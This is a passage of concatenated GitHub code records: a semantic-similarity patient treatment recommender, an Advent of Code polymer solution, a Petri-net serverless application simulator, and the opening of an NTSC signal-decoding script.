en_core_web_lg\n# nlp = en_core_web_lg.load()\nimport requests\nimport re\nimport csv\nimport math\nimport sys\nfrom collections import Counter\nimport nltk\n# nltk.download('punkt')\n# nltk.download('wordnet')\nfrom nltk.corpus import wordnet as wn\n# nltk.download('brown')\nfrom nltk.corpus import brown\nimport random\n\n\n\"\"\" load \"\"\"\nplt.ion()\ndf = pd.read_csv('/Users/xs/PycharmProjects/TREATRCOMM/data/patients_data.csv')\nprint(df.info(), df.head())\n\n\"\"\" preprocessing \"\"\"\nprint(df.isna().sum())\nnull_num = df.isna()['Treatment'].sum()\nprint(f\"Percentage of missing values in 'Treatment' is {null_num * 100 /df.shape[0]} % \")\nplt.figure() # figsize=(15,7)\nplt.bar(df.columns, df.isna().sum())\nplt.title('Missing values for each column')\nplt.xlabel('Columns')\nplt.ylabel('Number of Missing Values')\n\ndf.dropna(subset=['Treatment'], inplace=True)\nprint(df.isna().sum())\n\n\"\"\" data cleaning \"\"\"\n# remove words that do not belong to the treatments\nl = ['Fatigue', 'Anxious mood','Pain', 'Insomnia', 'Skin pain', 'Psoriatic plaques (scaly patches)', 'swelling)']\nrecord = set()\nfor index, row in df.iterrows():\n new = re.split(',|\"', row['Treatment'])\n for word in l:\n if word in new:\n record.add(index)\ndf.drop(list(record), inplace=True)\ndf.reset_index(drop=True, inplace=True)\n\ndf.sort_values('Condition', ascending=True, inplace=True)\ndf.reset_index(drop=True, inplace=True)\nprint(f\"Final size of the dataset is: {df.shape[0]}\")\n\n\"\"\" EDA \"\"\"\nclass EDA:\n def __init__(self):\n pass\n\n\nclass Mapping(EDA):\n\n # create mapping\n def one_to_n_mapping(self, df, mapping_from, mapping_to):\n feature_name = df[mapping_from].unique()\n mapping = dict()\n visited = set()\n for feature in feature_name:\n if feature not in visited:\n visited.add(feature)\n mapping[feature] = set()\n for feature in feature_name:\n new = df.loc[df[mapping_from] == feature]\n for index, row in new.iterrows():\n results = row[mapping_to].split(',')\n for result in results:\n mapping[feature].add(result)\n return mapping\n\n def n_to_one_mapping(self, df, mapping_from, mapping_to):\n visited = set()\n mapping = dict()\n for index, row in df.iterrows():\n new = re.split(',|\"', row[mapping_from])\n for feature in new:\n if feature not in visited and feature:\n visited.add(feature)\n mapping[feature] = set()\n\n m = self.one_to_n_mapping(df, mapping_to, mapping_from)\n for index, row in df.iterrows():\n new = re.split(',|\"', row[mapping_from])\n for feature in new:\n for m_key, m_value in m.items():\n if feature not in m_value:\n continue\n mapping[feature].add(m_key)\n return mapping\n\n\nclass Visualization(EDA):\n\n # word cloud visualization\n def word_cloud(self, df, mapping_from, mapping=None):\n if mapping:\n res = ''\n for feature in df[mapping_from].unique():\n a = mapping[feature]\n k = ' '.join(a)\n res += k\n else:\n df_feature = df[mapping_from]\n res = ' '.join(df_feature)\n\n wordcloud = WordCloud(width=1000, height=500, background_color='white').generate(res)\n plt.figure()\n plt.imshow(wordcloud, interpolation=\"bilinear\")\n plt.axis('off')\n\n def top_n_visualization(self, dictionary, first_n=10, xlabel=None, ylabel=None):\n plt.figure()\n sns_2 = sns.barplot(x=list(dictionary.keys())[:first_n], y=list(dictionary.values())[:first_n])\n sns_2.set_title(\"Most {} frequent {}\".format(first_n, xlabel))\n sns_2.set_xlabel(xlabel)\n sns_2.set_ylabel(\"Number of {}\".format(ylabel))\n plt.xticks(rotation=45)\n\n\nmapper = Mapping()\n
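\n# Illustrative shape of the mappings built next (keys come from the data; the\n# treatment values shown here are hypothetical):\n# mapper.one_to_n_mapping(df, 'Condition', 'Treatment')\n# -> {'Anxiety': {'Therapy', 'Exercise', ...}, ...}\n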
\n# each condition will have n treatments\nmapping_condition_treatment = mapper.one_to_n_mapping(df, mapping_from='Condition', mapping_to='Treatment')\nprint('condition-treatments: ', mapping_condition_treatment)\n\n# each condition will have n symptoms\nmapping_condition_symptom = mapper.one_to_n_mapping(df, mapping_from='Condition', mapping_to='Symptom')\n\n# each symptom occurs in n conditions\nmapping_symptom_condition = mapper.n_to_one_mapping(df, mapping_from='Symptom', mapping_to='Condition')\n\n# each treatment occurs in n conditions\nmapping_treatment_condition = mapper.n_to_one_mapping(df, mapping_from='Treatment', mapping_to='Condition')\n\nprint(len(mapping_condition_treatment['ADD (Attention Deficit Disorder)']))\nprint(\"number of unique conditions:\", len(df['Condition'].unique()))\nprint('\\n')\ncondition_dict = df['Condition'].value_counts()\nprint(condition_dict)\n\n# Most n frequent Conditions\nvs = Visualization()\ncondition_dict = dict(condition_dict)\nvs.top_n_visualization(condition_dict, first_n=10, xlabel=\"Conditions\", ylabel=\"Patients\")\nprint('condition-observations: ', condition_dict)\nprint(len(condition_dict))\n\ncondition_length_dict = {key: len(value) for key, value in mapping_condition_treatment.items()}\ncondition_length_dict = dict(sorted(condition_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(condition_length_dict, first_n=10, xlabel=\"Conditions\", ylabel=\"Treatments\")\nprint('condition-treatments: ', condition_length_dict)\nprint(len(condition_length_dict))\n\n# Most n frequent Treatments\ntreatment_length_dict = {key: len(value) for key, value in mapping_treatment_condition.items()}\ntreatment_length_dict = dict(sorted(treatment_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(treatment_length_dict, first_n=10, xlabel=\"Treatments\", ylabel=\"Conditions\")\nprint('treatment-conditions: ', treatment_length_dict)\nprint(len(treatment_length_dict))\n\n# Most n frequent Symptoms\nsymptom_length_dict = {key: len(value) for key, value in mapping_symptom_condition.items()}\nsymptom_length_dict = dict(sorted(symptom_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(symptom_length_dict, first_n=10, xlabel=\"Symptoms\", ylabel=\"Conditions\")\nprint('symptom-conditions: ', symptom_length_dict)\nprint(len(symptom_length_dict))\n\n# # Word cloud of condition frequency\n# vs.word_cloud(df, mapping_from='Condition')\n#\n# # Word cloud of treatment for different conditions\n# vs.word_cloud(df, 'Condition', mapping_condition_treatment)\n#\n# # Word cloud of symptoms for different conditions\n# vs.word_cloud(df, 'Condition', mapping_condition_symptom)\n\n\n\"\"\" train test split \"\"\"\n\n\"\"\" Recommendation \"\"\"\nnew_df = df.drop(columns=['Name', 'City', 'State'])\n# data = new_df.to_numpy()\ndata_train, data_test, y_train, y_test = train_test_split(new_df.iloc[:, :-1], new_df.iloc[:, -1], test_size=0.2, random_state=0)\ndata_train = pd.concat([data_train, y_train], axis=1).to_numpy()\ndata_test = data_test.to_numpy()\ny_test = y_test.to_numpy()\n\nALPHA = 0.2\nBETA = 0.45\nETA = 0.4\nPHI = 0.2\nDELTA = 0.85\n\nbrown_freqs = dict()\nN = 0\n\nWORD = re.compile(r'\\w+')\nsymp_list = []\nsymptoms_list = []\nsymp_similar = []\nfinal_list = []\ni = 0\nthreshold_val = 0.4\n\n\nclass WordSimilarity:\n def get_best_synset_pair(self, word_1, word_2):\n max_sim = -1.0\n synsets_1 = wn.synsets(word_1)\n synsets_2 = wn.synsets(word_2)\n if len(synsets_1) == 0 or len(synsets_2) == 0:\n return None, None\n
max_sim = -1.0\n best_pair = None, None\n for synset_1 in synsets_1:\n for synset_2 in synsets_2:\n sim = wn.path_similarity(synset_2, synset_1)\n if sim > max_sim:\n max_sim = sim\n best_pair = synset_1, synset_2\n return best_pair\n\n def length_dist(self, synset_1, synset_2):\n l_dist = sys.maxsize\n if synset_1 is None or synset_2 is None:\n return 0.0\n if synset_1 == synset_2:\n l_dist = 0.0\n else:\n wset_1 = set([str(x.name()) for x in synset_1.lemmas()])\n wset_2 = set([str(x.name()) for x in synset_2.lemmas()])\n if len(wset_1.intersection(wset_2)) > 0:\n l_dist = 1.0\n else:\n l_dist = synset_1.shortest_path_distance(synset_2)\n if l_dist is None:\n l_dist = 0.0\n return math.exp(-ALPHA * l_dist)\n\n def hierarchy_dist(self, synset_1, synset_2):\n\n h_dist = sys.maxsize\n if synset_1 is None or synset_2 is None:\n return h_dist\n if synset_1 == synset_2:\n # return the depth of one of synset_1 or synset_2\n h_dist = max([x[1] for x in synset_1.hypernym_distances()])\n else:\n # find the max depth of least common ancestor\n hypernyms_1 = {x[0]: x[1] for x in synset_1.hypernym_distances()}\n hypernyms_2 = {x[0]: x[1] for x in synset_2.hypernym_distances()}\n lcs_candidates = set(hypernyms_1.keys()).intersection(\n set(hypernyms_2.keys()))\n if len(lcs_candidates) > 0:\n lcs_dists = []\n for lcs_candidate in lcs_candidates:\n lcs_d1 = 0\n if lcs_candidate in hypernyms_1:\n lcs_d1 = hypernyms_1[lcs_candidate]\n lcs_d2 = 0\n if lcs_candidate in hypernyms_2:\n lcs_d2 = hypernyms_2[lcs_candidate]\n lcs_dists.append(max([lcs_d1, lcs_d2]))\n h_dist = max(lcs_dists)\n else:\n h_dist = 0\n return ((math.exp(BETA * h_dist) - math.exp(-BETA * h_dist)) /\n (math.exp(BETA * h_dist) + math.exp(-BETA * h_dist)))\n\n def word_similarity(self, word_1, word_2):\n synset_pair = self.get_best_synset_pair(word_1, word_2)\n return (self.length_dist(synset_pair[0], synset_pair[1]) *\n self.hierarchy_dist(synset_pair[0], synset_pair[1]))\n\n # def word_similarity(self, word_1, word_2):\n # synset_pair = self.get_best_synset_pair(word_1, word_2)\n # if not synset_pair[0] or not synset_pair[1]:\n # return 0\n # return synset_pair[0].wup_similarity(synset_pair[1])\n\n\nclass TextualSimilarity(WordSimilarity):\n\n def cosine_similarity(self, vec1, vec2):\n\n intersection = set(vec1.keys()) & set(vec2.keys())\n numerator = sum([vec1[x] * vec2[x] for x in intersection])\n\n sum1 = sum([vec1[x] ** 2 for x in vec1.keys()])\n sum2 = sum([vec2[x] ** 2 for x in vec2.keys()])\n denominator = math.sqrt(sum1) * math.sqrt(sum2)\n\n if not denominator:\n return 0.0\n else:\n return float(numerator) / denominator\n\n def tokenize(self, text):\n\n words = WORD.findall(text)\n return Counter(words)\n\n def textual_similarity(self, text1, text2):\n\n vector1 = self.tokenize(text1.lower())\n vector2 = self.tokenize(text2.lower())\n cosine = self.cosine_similarity(vector1, vector2)\n return cosine\n\n\nclass SentenceSimilarity(WordSimilarity):\n\n def most_similar_word(self, word, word_set):\n\n max_sim = -1.0\n sim_word = \"\"\n for ref_word in word_set:\n sim = self.word_similarity(word, ref_word)\n if sim > max_sim:\n max_sim = sim\n sim_word = ref_word\n return sim_word, max_sim\n\n def info_content(self, lookup_word):\n\n global N\n if N == 0:\n for sent in brown.sents():\n for word in sent:\n word = word.lower()\n if word not in brown_freqs:\n brown_freqs[word] = 0\n brown_freqs[word] = brown_freqs[word] + 1\n N = N + 1\n lookup_word = lookup_word.lower()\n n = 0 if lookup_word not in brown_freqs else 
brown_freqs[lookup_word]\n return 1.0 - (math.log(n + 1) / math.log(N + 1))\n\n def semantic_vector(self, words, joint_words, info_content_norm):\n\n sent_set = set(words)\n semvec = np.zeros(len(joint_words))\n i = 0\n for joint_word in joint_words:\n if joint_word in sent_set:\n semvec[i] = 1.0\n if info_content_norm:\n semvec[i] = semvec[i] * math.pow(self.info_content(joint_word), 2)\n else:\n sim_word, max_sim = self.most_similar_word(joint_word, sent_set)\n semvec[i] = PHI if max_sim > PHI else 0.0\n if info_content_norm:\n semvec[i] = semvec[i] * self.info_content(joint_word) * self.info_content(sim_word)\n i = i + 1\n return semvec\n\n def semantic_similarity(self, sentence_1, sentence_2, info_content_norm):\n\n words_1 = nltk.word_tokenize(sentence_1)\n words_2 = nltk.word_tokenize(sentence_2)\n temp_words = words_1 + words_2\n joint_words = sorted(list(set(words_1).union(set(words_2))), key=temp_words.index)\n vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)\n vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)\n return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))\n\n def word_order_vector(self, words, joint_words, windex):\n\n wovec = np.zeros(len(joint_words))\n i = 0\n wordset = set(words)\n for joint_word in joint_words:\n if joint_word in wordset:\n for w_i, word in enumerate(words):\n if word == joint_word:\n wovec[i] = w_i + 1\n else:\n sim_word, max_sim = self.most_similar_word(joint_word, wordset)\n if max_sim > ETA:\n wovec[windex[joint_word]] = windex[sim_word] + 1\n else:\n wovec[windex[joint_word]] = 0\n i = i + 1\n return wovec\n\n def isfloat(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def word_order_similarity(self, sentence_1, sentence_2):\n\n words_1 = nltk.word_tokenize(sentence_1)\n words_2 = nltk.word_tokenize(sentence_2)\n temp_word = words_1 + words_2\n joint_words = sorted(list(set(words_1).union(set(words_2))), key=temp_word.index)\n windex = {x[1]: x[0] for x in enumerate(joint_words)}\n r1 = self.word_order_vector(words_1, joint_words, windex)\n r2 = self.word_order_vector(words_2, joint_words, windex)\n return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))\n\n def sentence_similarity(self, sentence_1, sentence_2, info_content_norm):\n\n return DELTA * self.semantic_similarity(sentence_1, sentence_2, info_content_norm) + \\\n (1.0 - DELTA) * self.word_order_similarity(sentence_1, sentence_2)\n\n\nclass RecommendationSystem:\n\n def __init__(self, data, top_k, top_n):\n self.txtsim = TextualSimilarity()\n self.sentsim = SentenceSimilarity()\n self.data = data\n self.top_k_users = top_k\n self.top_n_recommendations = top_n\n\n def find_similar_symptoms(self, user_symptom):\n similar_list = []\n file = open('/Users/xs/PycharmProjects/TREATRCOMM/data/symptoms_similar.txt', 'r')\n\n for line in file:\n line = line.rstrip('\\n')\n symptoms_file = line.split('\\t')\n\n for symp in user_symptom:\n if symp == symptoms_file[0]:\n for item in symptoms_file:\n similar_list.append(item)\n break\n\n # textual similarity: cosine similarity\n text_sim = self.txtsim.textual_similarity(symp, symptoms_file[0])\n # semantic similarity + word order similarity\n semantic_val = self.sentsim.sentence_similarity(symp, symptoms_file[0], True)\n if self.sentsim.isfloat(semantic_val):\n semantic_sim = float(semantic_val)\n else:\n semantic_sim = 0.0\n if text_sim > 0.75 or semantic_sim > threshold_val:\n for item in symptoms_file:\n 
similar_list.append(item)\n break\n\n # use conceptnet to find similar symptoms (query)\n for symp in user_symptom:\n symptom = symp.lower().replace(' ', '_')\n obj = requests.get('http://api.conceptnet.io/query?node=/c/en/' + symptom + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link in obj['edges']:\n word1 = link['end']['label']\n word2 = link['start']['label']\n similar_list.append(word1)\n similar_list.append(word2)\n\n return list(set(similar_list))\n\n def find_similar_patients(self, user_symptom, user_disease, age, gender):\n\n # use ConceptNet to find user_symptom and user_disease synonyms\n fuzzy_user_disease = []\n user_disease_slash = re.sub(r\"\\(.*?\\)|\\{.*?}|\\[.*?]\", \"\", user_disease.lower()).strip().replace(' ', '_')\n p1 = re.compile(r'[(](.*?)[)]', re.S)\n user_disease_parenthesis = re.findall(p1, user_disease.lower())\n if user_disease_parenthesis:\n user_disease_parenthesis = user_disease_parenthesis[0].strip().replace(' ', '_')\n obj2 = requests.get(\n 'http://api.conceptnet.io/query?node=/c/en/' + user_disease_parenthesis + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link2 in obj2['edges']:\n word3 = link2['end']['label']\n word4 = link2['start']['label']\n fuzzy_user_disease.append(word3.lower())\n fuzzy_user_disease.append(word4.lower())\n # print(user_disease_slash)\n # print(user_disease_parenthesis)\n\n obj = requests.get(\n 'http://api.conceptnet.io/query?node=/c/en/' + user_disease_slash + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link in obj['edges']:\n word1 = link['end']['label']\n word2 = link['start']['label']\n fuzzy_user_disease.append(word1.lower())\n fuzzy_user_disease.append(word2.lower())\n\n fuzzy_user_disease.append(user_disease)\n fuzzy_user_disease = list(set(fuzzy_user_disease))\n print(fuzzy_user_disease)\n\n # 找相似的symptom,和input的symptom合并\n similar_symptom = self.find_similar_symptoms(user_symptom)\n # print('similar symptom', similar_symptom)\n\n for i, item in enumerate(similar_symptom):\n similar_symptom[i] = item.lower()\n user_symp_len = len(user_symptom)\n user_symptom = user_symptom + similar_symptom\n symptom_list = list(set(user_symptom))\n for i, item in enumerate(symptom_list):\n symptom_list[i] = item.strip('\\r')\n # print('symptom_list', symptom_list)\n\n similarity = []\n top_treatments = []\n\n for row in self.data:\n patient_gender, patient_age, conditions, symptoms_to_check, patient_treatments = row[0], row[1], row[2],\\\n row[3].split(','), row[4]\n\n # user input disease not same to the condition in current check row, next row\n for fuzzy in fuzzy_user_disease:\n if fuzzy.lower() not in conditions.lower():\n continue\n\n # if same\n for i, symptom in enumerate(symptoms_to_check):\n symptoms_to_check[i] = symptom.lower()\n common_symptom = [symptom for symptom in symptom_list if symptom.lower() in symptoms_to_check]\n similarity_val = float(len(common_symptom) / (len(symptoms_to_check) + user_symp_len))\n if (similarity_val, patient_gender, patient_age, patient_treatments) in similarity:\n continue\n\n similarity.append((similarity_val, patient_gender, patient_age, patient_treatments))\n\n similarity.sort(reverse=True)\n print('similarity', similarity)\n\n # matching patients\n users_matched = 0\n for value, p_gender, p_age, p_treatments in similarity:\n # return top k similar patients\n if users_matched == self.top_k_users:\n break\n\n # filter: gender, difference of age > 5, similarity = 0\n if p_gender.lower() != gender.lower() or abs(int(p_age) - int(age)) > 20 or value == 0:\n 
continue\n\n            # find treatments from similar patients\n            tms = p_treatments.split(',')\n            for tm in tms:\n                top_treatments.append(tm)\n            users_matched += 1\n\n        # recommend treatments\n        treatments = dict()\n        for treatment in top_treatments:\n            treatments[treatment] = treatments.get(treatment, 0) + 1\n        treatments = dict(sorted(treatments.items(), key=lambda x: x[1], reverse=True))\n        # print('similar conditions', fuzzy_user_disease, '\\nsimilar symptoms', symptom_list)\n        print('treatment dict:', treatments)\n        top_n_treatments = list(treatments)[:self.top_n_recommendations]\n        print('final top N treatment', top_n_treatments)\n        return top_n_treatments\n\n    def collaborative_filter(self, symptom, disease, age, gender):\n\n        user_symptom = symptom.split(',')\n        for i, item in enumerate(user_symptom):\n            user_symptom[i] = item.lower()\n\n        return self.find_similar_patients(user_symptom, disease, age, gender)\n\n\nclass ReferenceSystem:\n    \"\"\" Reference System: Trivial and Baseline \"\"\"\n    def __init__(self, data, k):\n        self.data = data\n        self.top_k = k\n\n    def trivial_system(self, run_time=10):\n        pass\n        # random recommendation\n        treatment_index = random.randint(0, len(treatment_length_dict) - 1)\n        treatment_number = random.randint(0, 10)\n\n        # run more than 10 times and take the average:\n        # trivial 1. random recommendation based on index, without any prior knowledge (658 * length choose randint?)\n        # trivial 2. randomly choose k patients (similar to recommending the top k in the RS) and\n        # combine their treatments as the y_pred (658 * (k1 + k2 + ...))\n\n    def baseline_system(self):\n        pass\n\n        # baseline 1. POP (popular products): this model recommends the most popular products in the training set.\n        # (658 * length choose randint?)\n        # baseline 2. random recommendation within the condition-treatments mapping (658 * length choose randint?)\n        # baseline 3. recommend the top k frequent treatments within the condition-treatments mapping (658 * k);\n        # advisor's note: recommend the most commonly used treatments for this symptom, with top-k returning the k most frequent ones\n\n        # Q: length of the prediction? 5? random int?\n\n\ndef evaluation(model, reference):\n    \"\"\" Evaluation \"\"\"\n    # Micro precision (joint1 + joint2 + ... / yhat1 + yhat2 + ...), recall, f1\n\n    count = 0\n    record = dict()\n    xgrid_min, xgrid_max = 0, -sys.maxsize\n    y_len, y_hat_len, total_intercept = 0, 0, 0\n    for i in range(len(data_test)):\n        count += 1\n        print('==='*20)\n        print('Patient No.' 
+ str(count), data_test[i])\n symptom, condition, age, gender = data_test[i][3], data_test[i][2], data_test[i][1], data_test[i][0]\n if reference == 'trivial':\n y_pred = model.trivial_system(symptom, condition, age, gender)\n elif reference == 'baseline':\n y_pred = model.baseline_system(symptom, condition, age, gender)\n else:\n y_pred = model.collaborative_filter(symptom, condition, age, gender)\n xgrid_min, xgrid_max = 0, max(xgrid_max, len(y_pred))\n record[len(y_pred)] = record.get(len(y_pred), 0) + 1\n print('recommendation:', y_pred)\n y_true = y_test[i].split(',')\n print('y_true', y_true)\n total_intercept += len(set(y_true).intersection(set(y_pred)))\n\n y_len += len(y_true)\n y_hat_len += len(y_pred)\n print(total_intercept, y_len, y_hat_len)\n precision_k = total_intercept / y_hat_len\n recall_k = total_intercept / y_len\n f1_k = (2 * precision_k * recall_k) / (precision_k + recall_k)\n print('top{} similar patients, with top{} treatments precision = {}, recall = {}, f1 = {}'.format(k, n, precision_k, recall_k, f1_k))\n plt.figure()\n plt.title('Distribution of the length of prediction')\n plt.bar(*zip(*record.items()))\n plt.xlabel('Length of the prediction')\n plt.ylabel('Number of Datapoints')\n\n\nif __name__ == '__main__':\n \"\"\" no sentence semantic similarity; fuzzy search; w+h distance measure; visited set \"\"\"\n k = 3\n n = 3\n\n # trivial system\n # rfs_trivial = ReferenceSystem(data=data_train, top_k=k)\n # evaluation(rfs_trivial, 'trivial')\n #\n # # baseline system\n # # Pop : POP (popular products): this model recommends the most popular products in the training set.\n # # [python]https://github.com/ss87021456/Recommendation-System-Baseline\n # rfs_baseline = ReferenceSystem(data=data_train, top_k=k)\n # evaluation(rfs_baseline, 'baseline')\n\n # CF\n trs = RecommendationSystem(data=data_train, top_k=k, top_n=n)\n evaluation(trs, 'rs')\n\n\n\n\n# line = ['Female', 41, 'Rheumatoid Arthritis (RA)', 'Depressed mood']\n\n# print(trs.collaborative_filter('Pain,Excessive yawning,Depressed mood,Constipation,Excess saliva,Emotional lability', 'PLS (Primary Lateral Sclerosis)', 56, 'Male'))\n# print('Recommend Treatments: ', trs.collaborative_filter('Depressed mood', 'high blood pressure', 35, 'male'))\n #'Excessive daytime sleepiness (somnolence),Bowel problems, Emotional lability,Anxious mood,Brain fog,Stiffness/Spasticity,Bladder problems,Pain', 'Multiple Sclerosis', 54,'Female'))\n# 'Fingolimod,Interferon beta-1a IM Injection,Interferon beta-1a SubQ injection,Dimethyl fumarate,Teriflunomide,Baclofen']\n\n\nplt.ioff()\nplt.show()\n","repo_name":"sxu75374/TreatME-A-semantic-patient-similarity-based-treatment-recommendation-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16607499551","text":"from collections import defaultdict\nfrom typing import DefaultDict\n\nINPUT_FILE = \"./sample.txt\" if False else \"./input.txt\"\n\npolymer_template: str or None = None\npair_insertion_rules: DefaultDict = defaultdict(str)\nwith open(INPUT_FILE, \"r\") as input_file:\n for i, line in enumerate(map(str.strip, input_file.readlines())):\n if i == 0:\n polymer_template = line\n continue\n if i == 1 or not line:\n continue\n combination, insertion = list(map(str.strip, line.split(\"->\")))\n pair_insertion_rules[combination] = insertion\n\n\ndef part_1(steps=10):\n def get_new_polymer_template(template: str):\n new_template = 
list(template)\n inserted = []\n for x in range(len(template) - 1):\n insert = pair_insertion_rules[f\"{template[x]}{template[x + 1]}\"]\n if insert:\n new_template.insert(x + len(inserted) + 1, insert)\n inserted.append(insert)\n return \"\".join(new_template)\n\n new_template = str(polymer_template)\n for _ in range(steps):\n new_template = get_new_polymer_template(new_template)\n\n counter = defaultdict(int)\n most_common = new_template[0]\n least_common = new_template[0]\n for x in list(new_template):\n counter[x] += 1\n if counter[x] > counter[most_common]:\n most_common = x\n elif counter[x] < counter[least_common]:\n least_common = x\n print(f\"Part 1: {counter[most_common] - counter[least_common]}\")\n\n\ndef part_2():\n single_count = defaultdict(int)\n for x in list(polymer_template):\n single_count[x] += 1\n\n pairs = defaultdict(int)\n for x in range(len(polymer_template) - 1):\n pairs[polymer_template[x] + polymer_template[x + 1]] += 1\n\n for _ in range(40):\n inserted = []\n for pair in pair_insertion_rules.keys():\n if pair in pairs:\n inserted.append((pair, pair_insertion_rules[pair], pairs[pair]))\n del pairs[pair]\n\n for pair, insert, cnt in inserted:\n single_count[insert] += cnt\n pairs[pair[0] + insert] += cnt\n pairs[insert + pair[1]] += cnt\n\n print(f\"Part 2: {max(single_count.values()) - min(single_count.values())}\")\n\n\npart_1()\npart_2()\n","repo_name":"JJStoker/AOC","sub_path":"2021/14/extended_polymerization.py","file_name":"extended_polymerization.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"14065250349","text":"from slappsim.Petri import *\nfrom slappsim.States import Start\nfrom slappsim.Function import Function, FunctionStart\nfrom slappsim.Structures import Structure\nfrom slappsim.States import End\nfrom typing import List, Dict, Tuple\nfrom functools import partial\nimport multiprocessing\n\n\ndef zero_delay():\n return 0\n\n\nclass PetriApp(Petri):\n \"\"\"Serverless application CSPN model\n\n Conditional stochastic Petri net model of the serverless application\n\n Attributes:\n functions: A list of serverless functions in the CSPN model (F).\n transitions: A list of transitions in the CSPN model.\n structures: A list of structures in the serverless application (optional).\n delays: A dictionary that contains the partial functions to generate random delay for different delay types.\n pgs: Price per GB-second USD.\n ppi: Price per invocation in USD.\n\n \"\"\"\n\n def __init__(self, functions: List[Function], transitions: List[Transition], structures: List[Structure] = None,\n delays: Dict[str, partial] = None,\n pgs: float = 0.0000166667, ppi: float = 0.0000002) -> None:\n \"\"\"Inits the application CSPN model.\"\"\"\n self.functions = functions\n self.functions_map = {function.name: function for function in functions if function.name is not None}\n self.transitions = set(transitions)\n self.structures = [transition.parent_structure for transition in self.transitions if\n transition.parent_structure is not None]\n self.structures = list(set(self.structures))\n Petri.__init__(self, transitions=list(self.transitions))\n self.arcs = [item for transition in self.transitions for item in transition.in_arcs + transition.out_arcs]\n self.places = set([arc.place for arc in self.arcs])\n self.terminals = set([place for place in self.places if issubclass(place.__class__, End)])\n self.cost = None\n self.cost_records = []\n self.pgs = pgs\n self.pmms 
= self.pgs / 1024 / 1000\n self.ppi = ppi\n self.delays = delays if delays is not None else {}\n self.scheduling_overhead = None\n self.update_delays()\n\n def update_delays(self) -> None:\n \"\"\"Updates the delay\n\n Generates new delays for different types of transitions.\n Initializes the partial function to generate the scheduling overhead of the application.\n\n \"\"\"\n zero_delay_fun = partial(zero_delay)\n for transition in self.transitions:\n if transition.label is not None and self.delays.get(transition.label, None) is not None:\n transition.delay_fun = self.delays[transition.label]\n transition.sample()\n self.scheduling_overhead = self.delays.get(\"SchedulingOverhead\", zero_delay_fun)\n\n def reset(self) -> None:\n \"\"\"Resets the CSPN model\n\n Removes all tokens.\n Generates new firing delay (response time) and communication delay for serverless functions.\n\n \"\"\"\n for place in self.places:\n if type(place) is Start:\n place.holding = Token(elapsed_time=0)\n else:\n place.holding = None\n for function in self.functions:\n function.sample()\n\n def execute(self) -> Tuple[float, float, str, List]:\n \"\"\"Runs the CSPNs.\n\n Checks the enabled transitions, fires the enabled transitions, and solves the conflicts.\n\n Returns:\n A 4-tuple that contains the end-to-end response time, total cost, exit status, and firing logs.\n \"\"\"\n cost_list = []\n terminals_with_holding = []\n firing_logs = []\n while True:\n fired_transitions = self.run()\n for transition in fired_transitions:\n if transition.label == \"FunctionExecution\" or transition.label == \"Task\":\n cost_list.append((transition.last_fired_time, transition.get_cost(self.pmms, self.ppi)))\n firing_logs.append((transition.uid, transition.last_fired_time, transition.required_time,\n transition.get_cost(self.pmms, self.ppi)))\n else:\n firing_logs.append((transition.uid, transition.last_fired_time, transition.required_time, 0))\n is_terminated = False\n for terminal in self.terminals:\n if terminal.holding is not None:\n terminals_with_holding.append(terminal)\n if len(fired_transitions) == 0:\n is_terminated = True\n if is_terminated:\n break\n terminal_holdings = [terminal.holding for terminal in terminals_with_holding]\n elapsed_time = [token.elapsed_time for token in terminal_holdings]\n terminal_time = min(elapsed_time)\n cost = sum([cost for time, cost in cost_list if time <= terminal_time])\n exit_point = terminals_with_holding[elapsed_time.index(terminal_time)]\n firing_logs = [log for log in firing_logs if log[1] <= terminal_time]\n terminal_time = terminal_time + self.scheduling_overhead()\n return terminal_time, cost, exit_point.label, firing_logs\n\n def _execute(self, k: int) -> Tuple[List, List, List, List]:\n \"\"\"Runs the CSPNs k times\n\n Returns:\n A 4-tuple that contains the list of the end-to-end response time, list of the total cost, list of the exit\n status, and list of the firing logs. 
Each list has k elements.\n \"\"\"\n terminal_time = []\n cost = []\n exit_status = []\n firing_logs = []\n for i in range(k):\n self.reset()\n ert, c, status, log = self.execute()\n terminal_time.append(ert)\n cost.append(c)\n exit_status.append(status)\n firing_logs.append(log)\n return terminal_time, cost, exit_status, firing_logs\n\n def profile(self, k: int, cpu_count: int = None) -> Tuple[List, List, List, List]:\n \"\"\"Runs the CSPNs k times (parallel computing)\"\"\"\n cpu_count = multiprocessing.cpu_count() if cpu_count is None else cpu_count\n pool = multiprocessing.Pool(cpu_count)\n results = pool.map(self._execute, [int(k / cpu_count) for i in range(cpu_count)])\n pool.close()\n pool.join()\n terminal_time = []\n cost = []\n exit_status = []\n firing_logs = []\n for res in results:\n ert, c, status, log = res\n terminal_time += ert\n cost += c\n exit_status += status\n firing_logs += log\n return terminal_time, cost, exit_status, firing_logs\n","repo_name":"pacslab/SLAppMdlOpt","sub_path":"slappsim/PetriApp.py","file_name":"PetriApp.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26708941676","text":"import struct\nfrom PIL import Image\nimport fir_filter\nimport dll\nfrom math import sin, cos, pi\n\n\nrate = 315/88/108\n\nsync_start = 0\nsync_start_prev = 0\nsync_cnt = 0\nbackport_cnt = 0\ncolorburst_cnt = 0\nbackport_post_cnt = 0\nline_cnt = 0\n\nin_sync = False\nin_backporch = False\nin_colorburst = False\nin_backport_post = False\nin_line = False\nin_field = False\n\nline_has_color = False\n\nfields = []\nlines = []\nline = []\n\ncolorburst = []\ncos_filter = fir_filter.FirFilterLowPassRect(64, 0.044/8)\nsin_filter = 